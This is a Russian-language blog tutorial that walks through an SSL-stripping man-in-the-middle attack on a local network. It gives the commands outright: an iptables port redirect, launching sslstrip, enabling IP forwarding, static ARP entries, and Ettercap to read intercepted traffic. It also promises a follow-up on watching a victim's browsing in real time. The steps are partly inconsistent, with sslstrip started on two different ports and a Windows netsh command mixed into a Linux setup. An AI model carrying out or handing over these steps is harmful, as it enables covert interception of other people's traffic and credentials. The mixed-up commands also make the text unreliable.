Обход зашифрованного протокола Https

unnamed

Как и было мною обещано сейчас я расскажу вам как подменить тип шифрования дабы Ettercap смог понять что он отобрал для нас и не выкинул эту инфу.

Как раз для этого мы используем в тондеме с Ettercap(И его модулем mitm) новую програмку Ssl_Strip и IPtables.

Ssl_Strip как и IPtables не имеют графического интерфейса и по этому обычные пользователи предпочитают их не замечать, но мы не обычные,уже…

Настраиваем IPtables для перенаправления интернет трафика. С 80 порта на любой другой, у меня это 5050 порт :
iptables -t nat -A PREROUTING -p tcp —destination-port 80 -j REDIRECT —to-port 5050

Ну а теперь врубаем SSLstrip sslstrip -l  5050

Включаем форвардинг ip-forwarding пакетов:
echo «1» > /proc/sys/net/ipv4/ip_forward

Запускаем SSLstrip на просушку заданного нами порта:
sslstrip -l 8080
Убедитесь что вы не запустили через этот порт и другие «программы для поиска уезвимостей своих интернет сетей»

Создаем статический маршрут.
Два варианта:
Первый Вариант
arp -s 192.168.1.1 xx-xx-xx-xx-xx-xx

Второй вариант
Если первый не сработал то вот второй вариант:
netsh interface ipv4 add neighbors «Подключение по локальной сети» «192.168.1.1» «xx-x-xx-xx-xx-xx»

Ettercap

В следующей части я научу вас подсматривать за тем на какие сайты заходит пользователь в реальном времени

Оставить ответ

Ваш адрес email не будет опубликован. Обязательные поля помечены *